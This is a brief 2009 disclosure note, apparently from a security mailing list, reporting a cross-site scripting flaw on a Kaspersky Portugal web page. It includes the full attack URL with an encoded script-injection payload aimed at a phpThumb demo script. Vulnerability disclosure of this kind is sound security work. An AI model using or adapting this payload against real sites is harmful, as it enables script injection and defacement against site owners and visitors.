Kaspersky XSS

6/15/2009

Juha-Matti Laurio

http://linuxbox.org/pipermail/funsec/2009-June/021134.html



Kaspersky has an XSS vulnerability. An archive of it, along with any status updates on a fix, is available at XSSed.com.

XSS URL provided: http://www.kaspersky.com.pt/base/guest/phpthumb/demo/phpThumb.demo.showpic.php?src=images%2Fsmall.jpg&title=This%2Bis%2Ba%2Bsmall%2Bpicture&fltr[]=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(/XSS%20By%20TurKPoweR%20-%20FROM%20TURKEY/)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%20-%20FROM%20TURKEY%3C/h1%3E%3C/marquee%3E

